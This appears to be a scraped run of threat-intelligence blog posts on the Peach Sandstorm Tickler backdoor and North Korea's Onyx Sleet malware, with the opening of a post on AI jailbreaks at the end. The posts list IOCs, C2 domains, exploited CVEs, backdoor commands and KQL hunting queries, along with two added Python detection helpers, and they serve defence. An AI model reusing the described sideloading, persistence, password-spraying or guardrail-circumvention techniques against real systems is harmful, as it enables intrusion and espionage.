  • msvcp140.dll (SHA-256: dad53a78662707d182cdb230e999ef6effc0b259def31c196c51cc3e8c42a9b8)
  • LoggingPlatform.dll (SHA-256: 56ac00856b19b41bc388ecf749eb4651369e7ced0529e9bf422284070de457b6)
  • vcruntime140.dll (SHA-256: 22017c9b022e6f2560fee7d544a83ea9e3d85abee367f2f20b3b0448691fe2d4)
  • Microsoft.SharePoint.NativeMessaging.exe (SHA-256: e984d9085ae1b1b0849199d883d05efbccc92242b1546aeca8afd4b1868c54f5)

The files msvcp140.dll, LoggingPlatform.dll, vcruntime140.dll, and Microsoft.SharePoint.NativeMessaging.exe are legitimate Windows signed binaries likely used for DLL sideloading.

Additionally, we observed the sample downloading the following malicious files:

  • A batch script (SHA-256: 5df4269998ed79fbc997766303759768ce89ff1412550b35ff32e85db3c1f57b)
  • A DLL file (SHA-256: fb70ff49411ce04951895977acfc06fa468e4aa504676dedeb40ba5cea76f37f)
  • A DLL file (SHA-256: 711d3deccc22f5acfd3a41b8c8defb111db0f2b474febdc7f20a468f67db0350)

The batch script adds a registry Run key for a file called SharePoint.exe, likely used to load the malicious DLL files above, thus setting up persistence:

Figure 3. Registry Run key added to set up persistence (image of the Run key command from the batch script)

The two DLL files are both 64-bit C/C++ compiled PE DLL files and appear to be functionally identical to the previously analyzed samples. As fully functional backdoors, they can run the following commands:

  • systeminfo – Gather system information
  • dir – List directory
  • run – Execute command
  • delete – Delete file
  • interval – Sleep interval
  • upload – Download file from the C2
  • download – Upload file to the C2

Azure resources abuse

Microsoft observed Peach Sandstorm creating Azure tenants using Microsoft Outlook email accounts and creating Azure for Students subscriptions in these tenants. Additionally, the group leveraged compromised user accounts in the Azure tenants of organizations in the education sector to do the same. Within these subscriptions, Peach Sandstorm subsequently created Azure resources for use as C2 for the backdoor. Of note, we have observed multiple Iranian groups, including Smoke Sandstorm, use similar techniques in recent months. The following resources were created by Peach Sandstorm for use as Tickler C2 nodes:


Post-compromise activity

In the past year, Peach Sandstorm has successfully compromised several organizations, primarily in the aforementioned sectors, using bespoke tooling. Once Peach Sandstorm gains access to an organization, the threat actor is known to perform lateral movement and actions on objectives using the following techniques:

Moving laterally via Server Message Block (SMB)

After compromising a European defense organization, Peach Sandstorm threat actors moved laterally via SMB. SMB lateral movement is a technique used by threat actors to move from one compromised machine to another within a network by exploiting the SMB protocol. This protocol, which is used for sharing files, printers, and other resources on a network, could be misused by attackers to propagate their access and gain control over multiple systems.

Downloading and installing a remote monitoring and management (RMM) tool

In an older intrusion against a multinational pharmaceutical company not associated with the campaign discussed in this blog, after a likely successful password spray attack, Peach Sandstorm attempted to download and install AnyDesk, a commercial RMM tool. AnyDesk has a range of capabilities that allow users to remotely access a network, persist in a compromised environment, and enable command and control. The convenience and utility of a tool like AnyDesk is amplified by the fact that it might be permitted by application controls in environments where it is used legitimately by IT support personnel or system administrators.

Taking an Active Directory (AD) snapshot

In at least one intrusion against a Middle East-based satellite operator, Peach Sandstorm actors compromised a user using a malicious ZIP file delivered via a Microsoft Teams message, followed by dropping AD Explorer and taking an AD snapshot. An AD snapshot is a read-only, point-in-time copy of the AD database and related files, which can be used for various legitimate administrative tasks. These snapshots can also be exploited by threat actors for malicious purposes.

Mitigations

To harden networks against Peach Sandstorm activity, defenders can implement the following:

To protect against password spray attacks, implement the following mitigations:

Strengthen endpoints against attacks by following these steps:

Microsoft Defender XDR detections

Microsoft Defender Antivirus

Microsoft Defender Antivirus detects components of this threat as the following malware:

  • TrojanDownloader:Win64/Tickler
  • Backdoor:Win64/Tickler

Microsoft Defender for Endpoint

The following Microsoft Defender for Endpoint alerts can indicate associated threat activity:

  • Peach Sandstorm actor activity detected

The following alerts might also indicate threat activity related to this threat. Note, however, that these alerts can also be triggered by unrelated threat activity.

  • Password spraying
  • Unfamiliar Sign-in properties
  • An executable file loaded an unexpected DLL file

Microsoft Defender for Identity

The following Microsoft Defender for Identity alerts can indicate activity related to this threat. Note, however, that these alerts can also be triggered by unrelated threat activity.

  • Atypical travel
  • Suspicious behavior: Impossible travel activity

Microsoft Defender for Cloud Apps

The following Microsoft Defender for Cloud Apps alerts can indicate activity related to this threat. Note, however, that these alerts can also be triggered by unrelated threat activity.

  • Activity from a Tor IP address
  • Suspicious Administrative Activity
  • Impossible travel activity
  • Multiple failed login attempts
  • Activity from an anonymous proxy

Threat intelligence reports

Microsoft Defender Threat Intelligence customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to help prevent, mitigate, or respond to associated threats found in customer environments.

Microsoft Defender Threat Intelligence

Hunting queries

Microsoft Defender XDR

Microsoft Defender XDR customers can run the following query to find related activity in their networks:

Failed logon activity

The following query identifies failed sign-in attempts from multiple sources that originate from a single ISP. Attackers distribute their attempts across multiple IP addresses within a single service provider to evade detection.

IdentityLogonEvents
| where Timestamp > ago(4h)
| where ActionType == "LogonFailed"
| where isnotempty(AccountObjectId)
| summarize TargetCount = dcount(AccountObjectId), TargetCountry = dcount(Location), TargetIPAddress = dcount(IPAddress) by ISP
| where TargetCount >= 100
| where TargetCountry >= 5
| where TargetIPAddress >= 25
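As an added example (not Microsoft's code and not the query itself), the Python below re-implements the ISP-grouping logic of this query over constructed IdentityLogonEvents-style records, using the same 4-hour window and thresholds, and also counts failures per account to show why the spraying described earlier in the post stays below per-account lockout limits. The ISP names, IP addresses, accounts, user agents and timestamps in the sample are constructed.

```python
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta

@dataclass(frozen=True)
class LogonEvent:
    """One row shaped like IdentityLogonEvents; field names follow the query."""
    timestamp: datetime
    action_type: str        # "LogonSuccess" or "LogonFailed"
    account_object_id: str  # empty when the account could not be resolved
    ip_address: str
    location: str           # country code
    isp: str
    user_agent: str

# Thresholds and window copied from the hunting query above.
WINDOW = timedelta(hours=4)
MIN_ACCOUNTS = 100   # TargetCount >= 100
MIN_COUNTRIES = 5    # TargetCountry >= 5
MIN_IPS = 25         # TargetIPAddress >= 25
# Fixed "now" so the constructed sample below is reproducible.
SAMPLE_NOW = datetime(2024, 7, 1, 12, 0, 0)

def _in_scope(e, now):
    """Mirror the query's where clauses: last 4h, LogonFailed, resolved account."""
    return (e.timestamp > now - WINDOW
            and e.action_type == "LogonFailed"
            and bool(e.account_object_id))

def summarize_failed_logons(events, now):
    """Equivalent of the query's summarize ... by ISP: distinct accounts,
    countries and source IPs, plus the user agents seen (the post notes the
    actor's go-http-client agent)."""
    accounts, countries, ips, agents = (defaultdict(set) for _ in range(4))
    for e in events:
        if not _in_scope(e, now):
            continue
        accounts[e.isp].add(e.account_object_id)
        countries[e.isp].add(e.location)
        ips[e.isp].add(e.ip_address)
        agents[e.isp].add(e.user_agent)
    return {
        isp: {
            "TargetCount": len(accounts[isp]),
            "TargetCountry": len(countries[isp]),
            "TargetIPAddress": len(ips[isp]),
            "UserAgents": sorted(agents[isp]),
        }
        for isp in accounts
    }

def flag_spraying_isps(events, now):
    """ISPs passing all three thresholds, like the query's final where lines."""
    summary = summarize_failed_logons(events, now)
    return sorted(isp for isp, s in summary.items()
                  if s["TargetCount"] >= MIN_ACCOUNTS
                  and s["TargetCountry"] >= MIN_COUNTRIES
                  and s["TargetIPAddress"] >= MIN_IPS)

def failures_per_account(events, now):
    """Why per-account lockout misses spraying: each target sees few failures."""
    counts = defaultdict(int)
    for e in events:
        if _in_scope(e, now):
            counts[e.account_object_id] += 1
    return dict(counts)

def build_sample_events(now=SAMPLE_NOW):
    """Constructed sample data, not real telemetry: one ISP spraying 120
    accounts from 30 IPs in 6 countries, one office ISP with three users
    mistyping passwords, and one stale event outside the 4h window."""
    events = []
    countries = ["US", "DE", "BR", "IN", "SG", "ZA"]
    for i in range(120):
        events.append(LogonEvent(
            now - timedelta(minutes=i), "LogonFailed", f"acct-{i:04d}",
            f"203.0.113.{i % 30}",  # TEST-NET-3 documentation addresses
            countries[i % len(countries)], "ExampleSprayISP", "go-http-client/1.1"))
    for i in range(12):
        events.append(LogonEvent(
            now - timedelta(minutes=5 * i), "LogonFailed", f"acct-{i % 3:04d}",
            "198.51.100.7", "US", "ExampleOfficeISP", "Mozilla/5.0"))
    events.append(LogonEvent(
        now - timedelta(hours=5), "LogonFailed", "acct-9999",
        "192.0.2.1", "FR", "ExampleSprayISP", "curl/8.0"))
    return events

if __name__ == "__main__":
    evs = build_sample_events()
    for isp, stats in summarize_failed_logons(evs, SAMPLE_NOW).items():
        print(isp, stats)
    print("flagged:", flag_spraying_isps(evs, SAMPLE_NOW))
```

Run against real telemetry, the thresholds should be tuned to the tenant's baseline; the spraying ISP trips all three while each sprayed account records only a single failure.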

Connectivity to C2s

The following query identifies connectivity to the Azure App Service apps that Peach Sandstorm created for command and control.

let domainList = dynamic(["subreviews.azurewebsites.net",
    "satellite2.azurewebsites.net",
    "nodetestservers.azurewebsites.net",
    "satellitegardens.azurewebsites.net",
    "softwareservicesupport.azurewebsites.net",
    "getservicessuports.azurewebsites.net",
    "getservicessupports.azurewebsites.net",
    "getsupportsservices.azurewebsites.net",
    "satellitespecialists.azurewebsites.net",
    "satservicesdev.azurewebsites.net",
    "servicessupports.azurewebsites.net",
    "websupportprotection.azurewebsites.net",
    "supportsoftwarecenter.azurewebsites.net",
    "centersoftwaresupports.azurewebsites.net",
    "softwareservicesupports.azurewebsites.net",
    "getsdervicessupoortss.azurewebsites.net"]);
union
(
    DnsEvents
    | where QueryType has_any(domainList) or Name has_any(domainList)
    | project TimeGenerated, Domain = QueryType, SourceTable = "DnsEvents"
),
(
    IdentityQueryEvents
    | where QueryTarget has_any(domainList)
    | project Timestamp, Domain = QueryTarget, SourceTable = "IdentityQueryEvents"
),
(
    DeviceNetworkEvents
    | where RemoteUrl has_any(domainList)
    | project Timestamp, Domain = RemoteUrl, SourceTable = "DeviceNetworkEvents"
),
(
    DeviceNetworkInfo
    | extend DnsAddresses = parse_json(DnsAddresses), ConnectedNetworks = parse_json(ConnectedNetworks)
    | mv-expand DnsAddresses, ConnectedNetworks
    | where DnsAddresses has_any(domainList) or ConnectedNetworks.Name has_any(domainList)
    | project Timestamp, Domain = coalesce(DnsAddresses, ConnectedNetworks.Name), SourceTable = "DeviceNetworkInfo"
),
(
    VMConnection
    | extend RemoteDnsQuestions = parse_json(RemoteDnsQuestions), RemoteDnsCanonicalNames = parse_json(RemoteDnsCanonicalNames)
    | mv-expand RemoteDnsQuestions, RemoteDnsCanonicalNames
    | where RemoteDnsQuestions has_any(domainList) or RemoteDnsCanonicalNames has_any(domainList)
    | project TimeGenerated, Domain = coalesce(RemoteDnsQuestions, RemoteDnsCanonicalNames), SourceTable = "VMConnection"
),
(
    W3CIISLog
    | where csHost has_any(domainList) or csReferer has_any(domainList)
    | project TimeGenerated, Domain = coalesce(csHost, csReferer), SourceTable = "W3CIISLog"
),
(
    EmailUrlInfo
    | where UrlDomain has_any(domainList)
    | project Timestamp, Domain = UrlDomain, SourceTable = "EmailUrlInfo"
),
(
    UrlClickEvents
    | where Url has_any(domainList)
    | project Timestamp, Domain = Url, SourceTable = "UrlClickEvents"
)
| order by TimeGenerated desc

Malicious file activity

The following query surfaces events involving the malicious files related to this activity.

let fileHashes = dynamic(["711d3deccc22f5acfd3a41b8c8defb111db0f2b474febdc7f20a468f67db0350", "fb70ff49411ce04951895977acfc06fa468e4aa504676dedeb40ba5cea76f37f", "5df4269998ed79fbc997766303759768ce89ff1412550b35ff32e85db3c1f57b", "ccb617cc7418a3b22179e00d21db26754666979b4c4f34c7fda8c0082d08cec4", "7eb2e9e8cd450fc353323fd2e8b84fbbdfe061a8441fd71750250752c577d198"]);
union
(
    DeviceFileEvents
    | where SHA256 in (fileHashes)
    | project Timestamp, FileHash = SHA256, SourceTable = "DeviceFileEvents"
),
(
    DeviceEvents
    | where SHA256 in (fileHashes)
    | project Timestamp, FileHash = SHA256, SourceTable = "DeviceEvents"
),
(
    DeviceImageLoadEvents
    | where SHA256 in (fileHashes)
    | project Timestamp, FileHash = SHA256, SourceTable = "DeviceImageLoadEvents"
),
(
    DeviceProcessEvents
    | where SHA256 in (fileHashes)
    | project Timestamp, FileHash = SHA256, SourceTable = "DeviceProcessEvents"
)
| order by Timestamp desc

Microsoft Sentinel

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.

Indicators of compromise


Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence and on X (formerly Twitter) at https://twitter.com/MsftSecIntel.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

Onyx Sleet uses array of malware to gather intelligence for North Korea http://approjects.co.za/?big=en-us/security/blog/2024/07/25/onyx-sleet-uses-array-of-malware-to-gather-intelligence-for-north-korea/ Thu, 25 Jul 2024 15:57:18 +0000

On July 25, 2024, the United States Department of Justice (DOJ) indicted an individual linked to the North Korean threat actor that Microsoft tracks as Onyx Sleet. Microsoft Threat Intelligence collaborated with the Federal Bureau of Investigation (FBI) in tracking activity associated with Onyx Sleet. We will continue to closely monitor Onyx Sleet’s activity to assess changes following the indictment.

First observed by Microsoft in 2014, Onyx Sleet has conducted cyber espionage through numerous campaigns aimed at global targets with the goal of intelligence gathering. More recently, it has expanded its goals to include financial gain. This threat actor operates with an extensive set of custom tools and malware, and regularly evolves its toolset to add new functionality and to evade detection, while keeping a fairly uniform attack pattern. Onyx Sleet’s ability to develop a spectrum of tools to launch its tried-and-true attack chain makes it a persistent threat, particularly to targets of interest to North Korean intelligence, like organizations in the defense, engineering, and energy sectors.

Microsoft tracks campaigns related to Onyx Sleet and directly notifies customers who have been targeted or compromised, providing them with the necessary information to help secure their environments. In this blog, we will share intelligence about Onyx Sleet and its historical tradecraft and targets, as well as our analysis of recent malware campaigns, with the goal of enabling the broader community to identify and respond to similar campaigns. We also provide protection, detection, and hunting guidance to help improve defenses against these attacks.

Who is Onyx Sleet?

Onyx Sleet conducts cyber espionage primarily targeting military, defense, and technology industries, predominantly in India, South Korea, and the United States. This threat actor has historically leveraged spear-phishing as a means of compromising target environments; however, in recent campaigns, they have mostly exploited N-day vulnerabilities, leveraging publicly available and custom exploits to gain initial access. In October 2023, Onyx Sleet exploited the TeamCity CVE-2023-42793 vulnerability as a part of a targeted attack. Exploiting this vulnerability enabled the threat actor to perform a remote code execution attack and gain administrative control of the server.

Onyx Sleet develops and uses a spectrum of tools that range from custom to open source. They have built an extensive set of custom remote access trojans (RATs) that they use in campaigns, and routinely developed new variants of these RATs to add new functionality and implement new ways of evading detection. Onyx Sleet often uses leased virtual private servers (VPS) and compromised cloud infrastructure for command-and-control (C2).

Onyx Sleet is tracked by other security companies as APT45, SILENT CHOLLIMA, Andariel, DarkSeoul, Stonefly, and TDrop2.

Affiliations with other threat actors originating from North Korea

Onyx Sleet has demonstrated affiliations with other North Korean actors, indicating its integration with a broader network of North Korean cyber operations. Microsoft has observed an overlap between Onyx Sleet and Storm-0530. Both groups were observed operating within the same infrastructure and were involved in the development and use of ransomware in attacks in late 2021 and 2022.

Onyx Sleet targets

In pursuit of its primary goal of intelligence collection, Onyx Sleet has focused on targeting entities in the defense and energy industries, predominantly in India, South Korea, and the United States. Recent attacks include the targeting of South Korean educational institutions, construction companies, and manufacturing organizations in May 2024. Onyx Sleet has also shown interest in taking advantage of online gambling websites, possibly for financial gain either on behalf of North Korea or for individual members of the group.

Onyx Sleet tradecraft

Onyx Sleet has used the same tactics, techniques, and procedures (TTPs) over extended periods, suggesting the threat actor views its tradecraft as effective. Onyx Sleet historically leveraged spear-phishing to compromise targets, and in more recent campaigns, they have been observed to primarily use exploits for initial access, alongside a loader, downloader, and backdoor as a part of its well-established attack chain.

A diagram of the Onyx Sleet attack chain. The chain begins with initial access via exploitation of several vulnerabilities, to a loader malware, a downloader, and finally a backdoor.
Figure 1. Onyx Sleet attack chain

Onyx Sleet nevertheless made some changes, for example, adding new C2 servers and hosting IPs, creating new malware, and launching multiple campaigns over time. In the past, Onyx Sleet introduced custom ransomware strains as a part of its campaigns. It also created and deployed the RAT identified by Kaspersky as Dtrack, which was observed in global attacks from September 2019 to January 2024. The Dtrack RAT follows the common attack chain used by Onyx Sleet and includes the exploitation of the Log4j 2 CVE-2021-44228 vulnerability for initial access and the use of payloads signed with an invalid certificate masquerading as legitimate software to evade detection.

Another example of Onyx Sleet introducing variations in the implementation of its attack chain is the campaign identified by AhnLab Security Intelligence Center (ASEC) in May 2024. In this campaign, the threat actor employed a previously unseen malware family dubbed Dora RAT. Developed in the Go programming language, this custom malware strain targeted South Korean educational institutions, construction companies, and manufacturing organizations.

Onyx Sleet avoids common detection techniques across its attack lifecycle by heavily using custom encryption and obfuscation algorithms and launching as much of its code in memory as possible. These tools and techniques have been observed in several reported campaigns, including TDrop2.

Onyx Sleet has also used several off-the-shelf tools, including Sliver, remote monitoring and management (RMM) tools, SOCKS proxy tools, Ngrok, and masscan. We have also observed Onyx Sleet using commercial packers like Themida and VMProtect to obfuscate their malware. In January 2024, Microsoft Threat Intelligence identified a campaign attributed to Onyx Sleet that deployed a Sliver implant, an open-source C2 framework that supports multiple operators, listener types, and payload generation. Like the Dtrack RAT, this malware was signed with an invalid certificate impersonating Tableau software. Further analysis revealed that this Onyx Sleet campaign compromised multiple aerospace and defense organizations from October 2023 to June 2024.

Information on the file signature for the fake Tableau Software certificate.
Figure 2. File signature showing the fake Tableau Software certificate (source: VirusTotal)

Apart from the previously mentioned Log4j 2 vulnerability, Onyx Sleet has exploited other publicly disclosed (N-day) vulnerabilities to gain access to target environments. Some vulnerabilities recently exploited by Onyx Sleet include:

  • CVE-2023-46604 (Apache ActiveMQ)
  • CVE-2023-22515 (Confluence)
  • CVE-2023-27350 (PaperCut)
  • CVE-2023-42793 (TeamCity)

In addition to these well-known and disclosed vulnerabilities, Onyx Sleet has used custom exploit capabilities in campaigns targeting users mostly in South Korea. In these campaigns, Onyx Sleet exploited vulnerabilities in a remote desktop/management application, a data loss prevention application, a network access control system, and an endpoint detection and response (EDR) product.

Recent malware campaigns

In December 2023, South Korean authorities attributed attacks that stole over 1.2 TB of data from targeted South Korean defense contractors using custom malware to Andariel. Microsoft has attributed several custom malware families used in those attacks – TigerRAT, SmallTiger, LightHand, and ValidAlpha – to Onyx Sleet.

TigerRAT

Since 2020, Onyx Sleet has been observed using the custom RAT malware TigerRAT. In some campaigns using TigerRAT, Onyx Sleet exploited vulnerabilities in Log4j 2 to deliver and install the malware. When launched, this malware can steal confidential information and carry out commands, such as keylogging and screen recording, from the C2.

SmallTiger

In February 2024, ASEC identified SmallTiger, a new malware strain targeting South Korean defense and manufacturing organizations. During the process of lateral movement, this malware is delivered as a DLL file (SmallTiger[.]dll) and uses a C2 connection to download and launch the payload into memory. Microsoft researchers have determined that SmallTiger is a C++ backdoor with layered obfuscation, encountered in the wild as a Themida or VMProtect packed executable.

The SmallTiger campaign can be tied back to a campaign using a similar attack chain beginning in November 2023 that delivered the DurianBeacon RAT malware. In May 2024, Microsoft observed Onyx Sleet continuing to conduct attacks targeting South Korean defense organizations using SmallTiger.

LightHand

LightHand is a custom, lightweight backdoor used by Onyx Sleet for remote access of target devices. Via LightHand, Onyx Sleet can execute arbitrary commands through command shell (cmd.exe), get system storage information, perform directory listing, and create/delete files on the target device.

ValidAlpha (BlackRAT)

ValidAlpha (also known as BlackRAT) is a custom backdoor developed in the Go programming language and used by Onyx Sleet to target organizations globally in the energy, defense, and engineering sectors since at least 2023. ValidAlpha can run an arbitrary file, list contents of a directory, download a file, take screenshots, and launch a shell to execute arbitrary commands.

Samples of ValidAlpha analyzed by Microsoft had a unique PDB string: I:/01___Tools/02__RAT/Black/Client_Go/Client.go
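A hunting helper for that PDB string, added here as an example (not Microsoft's tooling): it scans a binary for CodeView RSDS debug records and reports the embedded PDB path, so a sample can be checked against the ValidAlpha string. The GUID and the byte blob standing in for a PE image are constructed placeholders.

```python
"""Extract CodeView RSDS PDB paths from a binary and match the ValidAlpha string.

Layout of an RSDS record (CodeView 7.0), as written by the linker:
    'RSDS' | GUID (16 bytes, little-endian) | age (uint32 LE) | NUL-terminated path
Added example; the sample image below is a constructed byte blob, not malware.
"""
import struct
import uuid

RSDS = b"RSDS"
MAX_PATH_BYTES = 1024  # bound the NUL search so a stray 'RSDS' in data cannot scan a whole file

# PDB path reported for ValidAlpha samples in the blog post.
VALIDALPHA_PDB = "I:/01___Tools/02__RAT/Black/Client_Go/Client.go"


def extract_rsds_pdb_paths(data: bytes):
    """Return [(guid_str, age, path)] for every well-formed RSDS record in data.

    Truncated records (no room for GUID + age) and records with no NUL
    terminator within MAX_PATH_BYTES are skipped rather than raising.
    """
    results = []
    pos = data.find(RSDS)
    while pos != -1:
        body = pos + len(RSDS)
        if body + 20 <= len(data):
            guid = uuid.UUID(bytes_le=data[body:body + 16])
            (age,) = struct.unpack_from("<I", data, body + 16)
            path_start = body + 20
            end = data.find(b"\x00", path_start, path_start + MAX_PATH_BYTES)
            if end != -1:
                path = data[path_start:end].decode("utf-8", errors="replace")
                if path:  # an empty path means the image carries no PDB reference
                    results.append((str(guid), age, path))
        pos = data.find(RSDS, pos + len(RSDS))
    return results


def matches_validalpha(data: bytes) -> bool:
    """True if any RSDS record in data carries the ValidAlpha PDB path exactly."""
    return any(path == VALIDALPHA_PDB for _, _, path in extract_rsds_pdb_paths(data))


def constructed_image() -> bytes:
    """Constructed stand-in for a PE image: an MZ header, padding, one RSDS record
    with the ValidAlpha path, and trailing zeros. A real sample keeps the record
    in the debug directory; the scanner does not depend on where it sits."""
    placeholder_guid = uuid.UUID("12345678-1234-5678-1234-567812345678")  # placeholder
    record = RSDS + placeholder_guid.bytes_le + struct.pack("<I", 1) \
        + VALIDALPHA_PDB.encode("utf-8") + b"\x00"
    return b"MZ" + b"\x90" * 64 + record + b"\x00" * 32


if __name__ == "__main__":
    for guid, age, path in extract_rsds_pdb_paths(constructed_image()):
        print(f"RSDS guid={guid} age={age} pdb={path}")
    print("ValidAlpha PDB match:", matches_validalpha(constructed_image()))
```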

Recommendations

Microsoft recommends the following mitigations to defend against attacks by Onyx Sleet:

  • Keep software up to date. Apply new security patches as soon as possible.
  • Turn on cloud-delivered protection in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to help cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants.
  • Enable network protection to help prevent access to malicious domains.
  • Run endpoint detection and response (EDR) in block mode so that Microsoft Defender for Endpoint can help block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to help remediate malicious artifacts that are detected post-breach.
  • Configure investigation and remediation in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to help resolve breaches, significantly reducing alert volume.

Microsoft Defender customers can turn on attack surface reduction rules to help prevent common attack techniques used by Onyx Sleet:

Detection details

Microsoft Defender Antivirus

Microsoft Defender Antivirus detects threat components as the following malware families:

Microsoft Defender for Endpoint

The following Microsoft Defender for Endpoint alerts can indicate associated threat activity:

  • Onyx Sleet activity group

The following alerts might also indicate threat activity related to this threat. Note, however, that these alerts can be also triggered by unrelated threat activity:

  • Document contains macro to download a file

Microsoft Defender Vulnerability Management

Microsoft Defender Vulnerability Management surfaces devices that may be affected by the following vulnerabilities used in this threat:

Microsoft Defender Threat Intelligence

Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.

Microsoft Sentinel queries

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.

Use this query to assess the existence of vulnerabilities used by Onyx Sleet:

DeviceTvmSoftwareVulnerabilities
| where CveId in ("CVE-2021-44228","CVE-2023-27350","CVE-2023-42793")
| project DeviceId,DeviceName,OSPlatform,OSVersion,SoftwareVendor,SoftwareName,SoftwareVersion,
CveId,VulnerabilitySeverityLevel
| join kind=inner ( DeviceTvmSoftwareVulnerabilitiesKB | project CveId, CvssScore,IsExploitAvailable,VulnerabilitySeverityLevel,PublishedDate,VulnerabilityDescription,AffectedSoftware ) on CveId
| project DeviceId,DeviceName,OSPlatform,OSVersion,SoftwareVendor,SoftwareName,SoftwareVersion,
CveId,VulnerabilitySeverityLevel,CvssScore,IsExploitAvailable,PublishedDate,VulnerabilityDescription,AffectedSoftware

Use this query to detect associated network IOCs:

let remoteip = dynamic(["84.38.134.56","45.155.37.101","213.139.205.151","109.248.150.147","162.19.71.175","147.78.149.201"]);
let remoteurl = dynamic(["americajobmail.site","privatemake.bounceme.net","ww3c.bounceme.net","advice.uphearth.com","http://84.38.134.56/procdump.gif"]);
DeviceNetworkEvents
// remoteip and remoteurl are arrays, so membership is tested with "in", not "=="
| where RemoteIP in (remoteip) or RemoteUrl in (remoteurl)
| project TimeGenerated, DeviceId, DeviceName, Protocol, LocalIP, LocalIPType, LocalPort, RemoteIP, RemoteIPType, RemotePort, RemoteUrl

Use this query to detect associated file IOCs:

let selectedTimestamp = datetime(2024-07-17T00:00:00.0000000Z);
let fileName = "SmallTiger.dll";
let FileSHA256 = dynamic(["f32f6b229913d68daad937cc72a57aa45291a9d623109ed48938815aa7b6005c","0837dd54268c373069fc5c1628c6e3d75eb99c3b3efc94c45b73e2cf9a6f3207","29c6044d65af0073424ccc01abcb8411cbdc52720cac957a3012773c4380bab3","fed94f461145681dc9347b382497a72542424c64b6ae6fcf945f4becd2d46c32","868a62feff8b46466e9d63b83135a7987bf6d332c13739aa11b747b3e2ad4bbf","f1662bee722a4e25614ed30933b0ced17b752d99fae868fbb326a46afa2282d5","1b88b939e5ec186b2d19aec8f17792d493d74dd6ab3d5a6ddc42bfe78b01aff1","3098e6e7ae23b3b8637677da7bfc0ba720e557e6df71fa54a8ef1579b6746061","8daa6b20caf4bf384cc7912a73f243ce6e2f07a5cb3b3e95303db931c3fe339f","7339cfa5a67f5a4261c18839ef971d7f96eaf60a46190cab590b439c71c4742b"]);
let SignerName = "INVALID:Tableau Software Inc.";
let Signerhash = "6624c7b8faac176d1c1cb10b03e7ee58a4853f91";
let certificateserialnumber = "76cb5d1e6c2b6895428115705d9ac765";
search in (AlertEvidence,BehaviorEntities,CommonSecurityLog,DeviceBaselineComplianceProfiles,DeviceEvents,DeviceFileEvents,DeviceImageLoadEvents,
DeviceLogonEvents,DeviceNetworkEvents,DeviceProcessEvents,DeviceRegistryEvents,DeviceFileCertificateInfo,DynamicEventCollection,EmailAttachmentInfo,OfficeActivity,SecurityEvent,ThreatIntelligenceIndicator)
TimeGenerated between ((selectedTimestamp - 1m) .. (selectedTimestamp + 90d)) // covers the 90 days starting July 17th; change selectedTimestamp to move the window
and
( FileName == fileName or OldFileName == fileName or ProfileName == fileName or InitiatingProcessFileName == fileName or InitiatingProcessParentFileName == fileName
or InitiatingProcessVersionInfoInternalFileName == fileName or InitiatingProcessVersionInfoOriginalFileName == fileName or PreviousFileName == fileName
or ProcessVersionInfoInternalFileName == fileName or ProcessVersionInfoOriginalFileName == fileName or DestinationFileName == fileName or SourceFileName == fileName
or ServiceFileName == fileName or SHA256 in (FileSHA256) or InitiatingProcessSHA256 in (FileSHA256) or Signer == SignerName or SignerHash == Signerhash or CertificateSerialNumber == certificateserialnumber )

Indicators of compromise


Fake Tableau certificate

  • Signer: INVALID:Tableau Software Inc.
  • SignerHash: 6624c7b8faac176d1c1cb10b03e7ee58a4853f91
  • CertificateSerialNumber: 76cb5d1e6c2b6895428115705d9ac765


AI jailbreaks: What they are and how they can be mitigated http://approjects.co.za/?big=en-us/security/blog/2024/06/04/ai-jailbreaks-what-they-are-and-how-they-can-be-mitigated/ Tue, 04 Jun 2024 17:00:00 +0000 Microsoft security researchers, in partnership with other security experts, continue to proactively explore and discover new types of AI model and system vulnerabilities. In this post we are providing information about AI jailbreaks, a family of vulnerabilities that can occur when the defenses implemented to protect AI from producing harmful content fails. This article will be a useful reference for future announcements of new jailbreak techniques.

Generative AI systems are made up of multiple components that interact to provide a rich user experience between the human and the AI model(s). As part of a responsible AI approach, AI models are protected by layers of defense mechanisms to prevent the production of harmful content or being used to carry out instructions that go against the intended purpose of the AI integrated application. This blog will provide an understanding of what AI jailbreaks are, why generative AI is susceptible to them, and how you can mitigate the risks and harms.

What is an AI jailbreak?

An AI jailbreak is a technique that can cause the failure of guardrails (mitigations). The resulting harm comes from whatever guardrail was circumvented: for example, causing the system to violate its operators’ policies, make decisions unduly influenced by one user, or execute malicious instructions. This technique may be associated with additional attack techniques such as prompt injection, evasion, and model manipulation. You can learn more about AI jailbreak techniques in our AI red team’s Microsoft Build session, How Microsoft Approaches AI Red Teaming.

Diagram of AI safety ontology, which shows relationship of system, harm, technique, and mitigation.
Figure 1. AI safety finding ontology 

